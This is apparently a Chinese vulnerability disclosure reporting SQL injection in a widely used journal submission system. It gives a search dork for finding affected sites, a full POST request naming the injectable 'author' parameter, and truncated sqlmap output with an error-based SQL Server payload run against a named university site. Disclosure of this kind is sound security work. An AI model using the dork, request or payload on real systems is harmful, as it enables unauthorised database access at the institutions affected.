某投稿系统通用型SQL注射漏洞(影响众多企事业单位及学校)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 没有证明到数据库就不给通过啊~~好吧重新提交下 ### 详细说明: http://74.125.111.99/search?q=inurl:Web/CommonPage.aspx?Id= 这里搜索到很多。随便找几个测试下: POST /web/keysearch.aspx HTTP/1.1 Host: www.XXXX.com User-Agent: Baiduspider Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: cck_lasttime=1410760097025; cck_count=0 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 95 author=1&butSearch=%e6%9f%a5%e8%af%a2&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf ### 漏洞证明: 案例一:湖南大学 http://dxjykx.cnmanu.cn/ sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: POST Parameter: author Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: author=1%' AND 9293=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105 )+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (9293=9293) THEN CHAR(49) ELSE...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息